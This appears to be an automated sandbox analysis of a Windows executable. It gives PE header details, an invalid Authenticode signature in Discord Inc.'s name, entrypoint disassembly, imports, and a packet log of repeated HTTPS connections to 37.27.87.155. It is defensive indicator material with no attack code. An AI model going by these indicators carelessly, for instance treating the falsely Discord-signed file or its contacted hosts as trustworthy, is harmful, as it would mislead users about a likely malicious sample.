Time Stamp:	0x614F9AE5 [Sat Sep 25 21:55:49 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	56a78d55f3f7af51443e58e0ce2fb5f6

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert EV Code Signing CA (SHA2), OU=www.digicert.com, O=DigiCert Inc, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	11/02/2021 01:00:00 03/05/2024 01:59:59
Subject Chain	CN=Discord Inc., OU=Select or enter, O=Discord Inc., L=San Francisco, S=California, C=US, SERIALNUMBER=5128862, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
Version:	3
Thumbprint MD5:	ADE905125DAD57B1E408EF1C24F835A6
Thumbprint SHA-1:	32FB014CC7E60ED19BED95963E21D4EB968D20F4
Thumbprint SHA-256:	B37C9978B8AFAF864014F0158EB366DBE2AB2331BFCA6F14A1D20A2EBADB33F8
Serial:	02D6AAEAB3924859805EBB529E314DE0

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A2E0h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080CCh]
mov esi, dword ptr [004080D0h]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007F91313C911Ah
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007F91313C90EAh
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [0042A2D8h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3b000	0x1890	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xc3232	0x4d20
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6515	0x6600	26e66bea3b62728a217ae7bf343ebc1a	False	0.6615349264705882	data	6.439707948554623	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x139a	0x1400	691f0273dad50ec603f6fedf850b58ee	False	0.45	data	5.145774564074664	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20338	0x600	4b75405561a3fcc45b8fe27a6808f3b5	False	0.4993489583333333	data	4.013698650446401	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x10000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3b000	0x1890	0x1a00	ec5046c4d3017e923cbd8819e3b22101	False	0.24263822115384615	data	2.495649939745133	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3b190	0x1128	Device independent bitmap graphic, 32 x 64 x 32, image size 4352	English	United States	0.15892531876138433
RT_DIALOG	0x3c2b8	0x100	data	English	United States	0.5234375
RT_DIALOG	0x3c3b8	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x3c4d8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x3c538	0x14	data	English	United States	1.05
RT_MANIFEST	0x3c550	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 30, 2024 07:43:53.060050964 CEST	49709	443	192.168.2.8	23.7.115.52
Apr 30, 2024 07:43:53.060094118 CEST	443	49709	23.7.115.52	192.168.2.8
Apr 30, 2024 07:43:53.060260057 CEST	49709	443	192.168.2.8	23.7.115.52
Apr 30, 2024 07:43:53.093566895 CEST	49709	443	192.168.2.8	23.7.115.52
Apr 30, 2024 07:43:53.093594074 CEST	443	49709	23.7.115.52	192.168.2.8
Apr 30, 2024 07:43:53.307828903 CEST	443	49709	23.7.115.52	192.168.2.8
Apr 30, 2024 07:43:53.308048964 CEST	49709	443	192.168.2.8	23.7.115.52
Apr 30, 2024 07:43:53.400095940 CEST	49709	443	192.168.2.8	23.7.115.52
Apr 30, 2024 07:43:53.400126934 CEST	443	49709	23.7.115.52	192.168.2.8
Apr 30, 2024 07:43:53.400500059 CEST	443	49709	23.7.115.52	192.168.2.8
Apr 30, 2024 07:43:53.400563002 CEST	49709	443	192.168.2.8	23.7.115.52
Apr 30, 2024 07:43:53.403985977 CEST	49709	443	192.168.2.8	23.7.115.52
Apr 30, 2024 07:43:53.448112011 CEST	443	49709	23.7.115.52	192.168.2.8
Apr 30, 2024 07:43:53.728144884 CEST	443	49709	23.7.115.52	192.168.2.8
Apr 30, 2024 07:43:53.728173018 CEST	443	49709	23.7.115.52	192.168.2.8
Apr 30, 2024 07:43:53.728188992 CEST	443	49709	23.7.115.52	192.168.2.8
Apr 30, 2024 07:43:53.728303909 CEST	49709	443	192.168.2.8	23.7.115.52
Apr 30, 2024 07:43:53.728303909 CEST	49709	443	192.168.2.8	23.7.115.52
Apr 30, 2024 07:43:53.728327990 CEST	443	49709	23.7.115.52	192.168.2.8
Apr 30, 2024 07:43:53.728369951 CEST	49709	443	192.168.2.8	23.7.115.52
Apr 30, 2024 07:43:53.828700066 CEST	443	49709	23.7.115.52	192.168.2.8
Apr 30, 2024 07:43:53.828759909 CEST	443	49709	23.7.115.52	192.168.2.8
Apr 30, 2024 07:43:53.828843117 CEST	49709	443	192.168.2.8	23.7.115.52
Apr 30, 2024 07:43:53.828876972 CEST	443	49709	23.7.115.52	192.168.2.8
Apr 30, 2024 07:43:53.828895092 CEST	49709	443	192.168.2.8	23.7.115.52
Apr 30, 2024 07:43:53.828917027 CEST	49709	443	192.168.2.8	23.7.115.52
Apr 30, 2024 07:43:53.846687078 CEST	443	49709	23.7.115.52	192.168.2.8
Apr 30, 2024 07:43:53.846740007 CEST	443	49709	23.7.115.52	192.168.2.8
Apr 30, 2024 07:43:53.846757889 CEST	49709	443	192.168.2.8	23.7.115.52
Apr 30, 2024 07:43:53.846772909 CEST	443	49709	23.7.115.52	192.168.2.8
Apr 30, 2024 07:43:53.846784115 CEST	49709	443	192.168.2.8	23.7.115.52
Apr 30, 2024 07:43:53.846787930 CEST	443	49709	23.7.115.52	192.168.2.8
Apr 30, 2024 07:43:53.846811056 CEST	49709	443	192.168.2.8	23.7.115.52
Apr 30, 2024 07:43:53.846839905 CEST	49709	443	192.168.2.8	23.7.115.52
Apr 30, 2024 07:43:53.856961966 CEST	49709	443	192.168.2.8	23.7.115.52
Apr 30, 2024 07:43:53.856997013 CEST	443	49709	23.7.115.52	192.168.2.8
Apr 30, 2024 07:43:53.911952972 CEST	49710	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:53.911993027 CEST	443	49710	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:53.912046909 CEST	49710	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:53.912389040 CEST	49710	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:53.912395000 CEST	443	49710	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:54.607374907 CEST	443	49710	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:54.607515097 CEST	49710	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:54.614345074 CEST	49710	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:54.614367008 CEST	443	49710	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:54.614759922 CEST	443	49710	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:54.614829063 CEST	49710	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:54.615648031 CEST	49710	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:54.660111904 CEST	443	49710	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:55.156796932 CEST	443	49710	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:55.156871080 CEST	49710	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:55.156888008 CEST	443	49710	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:55.156939983 CEST	49710	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:55.156999111 CEST	443	49710	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:55.157042980 CEST	49710	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:55.159486055 CEST	49710	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:55.159497976 CEST	443	49710	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:55.162576914 CEST	49711	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:55.162616014 CEST	443	49711	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:55.162694931 CEST	49711	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:55.163007975 CEST	49711	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:55.163019896 CEST	443	49711	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:55.611505985 CEST	443	49711	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:55.611684084 CEST	49711	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:55.612497091 CEST	49711	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:55.612503052 CEST	443	49711	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:55.617981911 CEST	49711	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:55.617990971 CEST	443	49711	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:56.453018904 CEST	443	49711	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:56.453128099 CEST	49711	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:56.453150988 CEST	443	49711	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:56.453174114 CEST	443	49711	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:56.453195095 CEST	49711	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:56.453213930 CEST	49711	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:57.555867910 CEST	49711	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:57.555915117 CEST	443	49711	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:57.598862886 CEST	49712	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:57.598917961 CEST	443	49712	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:57.599000931 CEST	49712	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:57.599737883 CEST	49712	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:57.599752903 CEST	443	49712	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:58.042476892 CEST	443	49712	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:58.042609930 CEST	49712	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:58.043668032 CEST	49712	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:58.043673992 CEST	443	49712	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:58.048463106 CEST	49712	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:58.048470020 CEST	443	49712	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:58.901118040 CEST	443	49712	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:58.901144981 CEST	443	49712	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:58.901221991 CEST	443	49712	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:58.901338100 CEST	49712	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:58.901388884 CEST	49712	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:58.902079105 CEST	49712	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:58.902092934 CEST	443	49712	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:58.906068087 CEST	49713	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:58.906115055 CEST	443	49713	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:58.906233072 CEST	49713	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:58.906969070 CEST	49713	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:58.906980991 CEST	443	49713	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:59.351121902 CEST	443	49713	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:59.351218939 CEST	49713	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:59.351804018 CEST	49713	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:59.351809025 CEST	443	49713	37.27.87.155	192.168.2.8
Apr 30, 2024 07:43:59.353724957 CEST	49713	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:43:59.353730917 CEST	443	49713	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:00.202900887 CEST	443	49713	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:00.202980042 CEST	443	49713	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:00.203033924 CEST	49713	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:00.203052998 CEST	443	49713	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:00.203092098 CEST	49713	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:00.203092098 CEST	49713	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:00.203156948 CEST	443	49713	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:00.203208923 CEST	49713	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:00.204174042 CEST	49713	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:00.204185009 CEST	443	49713	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:00.276670933 CEST	49714	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:00.276716948 CEST	443	49714	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:00.276794910 CEST	49714	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:00.277050972 CEST	49714	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:00.277060032 CEST	443	49714	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:00.720155954 CEST	443	49714	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:00.720345020 CEST	49714	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:00.720933914 CEST	49714	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:00.720947981 CEST	443	49714	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:00.738519907 CEST	49714	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:00.738543987 CEST	443	49714	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:00.738564968 CEST	49714	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:00.738574982 CEST	443	49714	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:01.681781054 CEST	443	49714	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:01.681862116 CEST	443	49714	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:01.682005882 CEST	49714	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:01.683203936 CEST	49714	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:02.559878111 CEST	49714	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:02.559906006 CEST	443	49714	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:02.560926914 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:02.560954094 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:02.561017990 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:02.561280966 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:02.561290979 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:03.003932953 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:03.004095078 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:03.009711981 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:03.009721994 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:03.015366077 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:03.015379906 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:03.705679893 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:03.705714941 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:03.705730915 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:03.705888987 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:03.705916882 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:03.705980062 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:03.706043959 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:03.820257902 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:03.820290089 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:03.820419073 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:03.820442915 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:03.820492983 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:03.948679924 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:03.948753119 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:03.948853970 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:03.948879004 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:03.948906898 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:03.948940039 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.052563906 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.052635908 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.052747011 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.052759886 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.052798033 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.052807093 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.126936913 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.127000093 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.127072096 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.127089024 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.127120018 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.127166033 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.175985098 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.176058054 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.176130056 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.176145077 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.176199913 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.179528952 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.219016075 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.219067097 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.219121933 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.219136000 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.219171047 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.219196081 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.258951902 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.259043932 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.259124994 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.259133101 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.259174109 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.259193897 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.301902056 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.301930904 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.302063942 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.302073956 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.302141905 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.345972061 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.346041918 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.346086025 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.346101046 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.346127987 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.346148968 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.380903959 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.380932093 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.381197929 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.381210089 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.381315947 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.406198978 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.406227112 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.406377077 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.406387091 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.406480074 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.431304932 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.431370020 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.431453943 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.431471109 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.431596994 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.451706886 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.451757908 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.451786995 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.451801062 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.451828957 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.451843023 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.472537041 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.472587109 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.472630978 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.472645998 CEST	443	49715	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:04.472659111 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.472687006 CEST	49715	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:04.493596077 CEST	443	49715	37.27.87.155	192.168.2.8
